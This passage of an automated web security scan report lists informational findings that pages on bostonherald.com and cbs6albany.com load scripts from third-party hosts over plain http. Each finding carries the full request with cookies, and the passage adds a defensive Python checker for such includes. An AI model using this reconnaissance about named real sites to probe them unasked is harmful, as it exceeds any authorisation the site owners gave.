Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.776. http://www.bostonherald.com/users/register/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/register/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.777. http://www.bostonherald.com/weather/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /weather/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /weather/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:04:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.778. http://www.cbs6albany.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:07 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 78123

<br clear="all" />


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:
...[SNIP]...
</script>
   <script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/common/tools/load.php?css=common_layout_newspaper_nonav,common_nav,common_search,common_zvents,common_broadcast,common_apticker,common_bc3,site" />
<script language="javascript" src="http://www.flashadengine.com/include/js/faeDivAd.js"></script>
...[SNIP]...
<div id="stats">
       <script type="text/javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=homepage&amp;shier=homepage&amp;ghier=homepage"></script>
...[SNIP]...
</div>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div class="fi_sidebarInner">
   <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
               <script language='javascript' type='text/javascript' src='http://common.onset.freedom.com/adsense/?position=0&scode=wrgb'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/15135/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
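The "Issue detail" line above is the scanner's standard text for a cross-domain script include: every host named in the response body (img.video.ap.org, www.flashadengine.com, common.onset.freedom.com, admin.brightcove.com, static.ak.connect.facebook.com, edge.quantserve.com, an.tacoda.net) can run JavaScript with the full privileges of the www.cbs6albany.com origin, and in this report every one of them is fetched over plain http. The following is an added example, not the crawler's code, that reimplements the check so it can be run offline against a saved response body: it collects every `<script src>` (including upper-case `<SCRIPT SRC>`, as in the last include above), resolves relative and protocol-relative URLs against the page URL, and groups the results by third-party host. The sample HTML is constructed from the script tags shown in this finding, with a first-party relative include, a protocol-relative include and an inline script added so the example exercises the cases a correct check must ignore or resolve; `first_party_hosts` is an assumed parameter for whitelisting a site's own CDN hosts.

```python
"""Cross-domain script include check over a captured HTML response.

Added example (not the scanner's own code): reimplements the check behind the
"dynamically includes scripts from other domains" finding so that it can be run
offline against a saved response body.
"""
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so <SCRIPT SRC=...>
        # is handled the same as <script src=...>.
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value and value.strip():
                    # Trailing whitespace inside the attribute (as in the
                    # apovn.js include captured above) is dropped here.
                    self.srcs.append(value.strip())


def cross_domain_scripts(page_url, html, first_party_hosts=()):
    """Return {host: [absolute script URL, ...]} for every script loaded from
    a host other than the page's own host (or any host in first_party_hosts,
    an assumed whitelist for a site's own CDN names)."""
    own = {urlparse(page_url).hostname.lower()}
    own.update(h.lower() for h in first_party_hosts)
    collector = _ScriptSrcCollector()
    collector.feed(html)
    findings = defaultdict(list)
    for src in collector.srcs:
        absolute = urljoin(page_url, src)  # resolves "/x.js" and "//host/x.js"
        host = (urlparse(absolute).hostname or "").lower()
        if host and host not in own:
            findings[host].append(absolute)
    return dict(findings)


def plain_http_scripts(findings):
    """Subset of the cross-domain script URLs that are fetched without TLS,
    i.e. modifiable by anyone on the network path."""
    return sorted(u for urls in findings.values() for u in urls
                  if urlparse(u).scheme == "http")


def summarize(page_url, html, first_party_hosts=()):
    """One line per third-party host, in the style of the scanner's issue detail."""
    findings = cross_domain_scripts(page_url, html, first_party_hosts)
    lines = []
    for host in sorted(findings):
        urls = findings[host]
        insecure = sum(1 for u in urls if urlparse(u).scheme == "http")
        lines.append(f"{host}: {len(urls)} script(s), {insecure} over plain http")
    return lines


# Constructed sample: the <script> tags from the homepage finding above, plus a
# first-party relative include, an inline script, and quant.js rewritten as a
# protocol-relative URL to exercise "//host/..." resolution.
SAMPLE_PAGE_URL = "http://www.cbs6albany.com/"
SAMPLE_HTML = """
<html><head>
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
<script src="/common/tools/site.js"></script>
<script language="javascript" src="http://www.flashadengine.com/include/js/faeDivAd.js"></script>
<script type="text/javascript">var inline = 1;</script>
</head><body>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
<script type="text/javascript" src="//edge.quantserve.com/quant.js"></script>
<SCRIPT SRC="http://an.tacoda.net/an/15135/slf.js" LANGUAGE="JavaScript"></SCRIPT>
</body></html>
"""

if __name__ == "__main__":
    for line in summarize(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(line)
```

The comparison is by exact hostname, which is what produces an "Information" finding for every distinct host; a site that serves its own scripts from a separate CDN name (the cache.heraldinteractive.com includes in the previous finding are that pattern) should pass those names in `first_party_hosts` so the list is left with genuine third parties. The severity is informational because nothing here is exploitable by itself, but each remaining host is a dependency whose compromise, or whose on-path modification when fetched over plain http, becomes script execution in the page's origin.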

18.779. http://www.cbs6albany.com/albany-community/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /albany-community/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-community/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:22 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:22 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=community&amp;ghier=community&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.780. http://www.cbs6albany.com/albany-tv-programming/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /albany-tv-programming/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-tv-programming/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:18 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:18 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=entertainment%7Ctv&amp;ghier=entertainment%7Ctv&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.781. http://www.cbs6albany.com/albany-weather-forecast

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /albany-weather-forecast

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-weather-forecast HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:35 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:35 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55367


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=weather&amp;ghier=weather&amp;us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">
           
<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.782. http://www.cbs6albany.com/common/archives/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/archives/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /common/archives/?cat=Movie+Reviews&db=fbi&template=movie.html HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:16 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:16 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 25770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=Education+Promo&amp;ghier=news%7Carchive&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.783. http://www.cbs6albany.com/common/archives/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/archives/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /common/archives/?cat=Local+News HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:56 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:56 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 34134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=Local+News&amp;ghier=news%7Carchive&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.784. http://www.cbs6albany.com/common/archives/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/archives/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /common/archives/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:41 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:41 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 33561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&amp;domain=www.cbs6albany.com&amp;ctype=section&amp;shier=news%7Carchive&amp;ghier=news%7Carchive&amp;us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&amp;placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.785. http://www.cbs6albany.com/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /search/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:30 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:30 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 47273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<br />
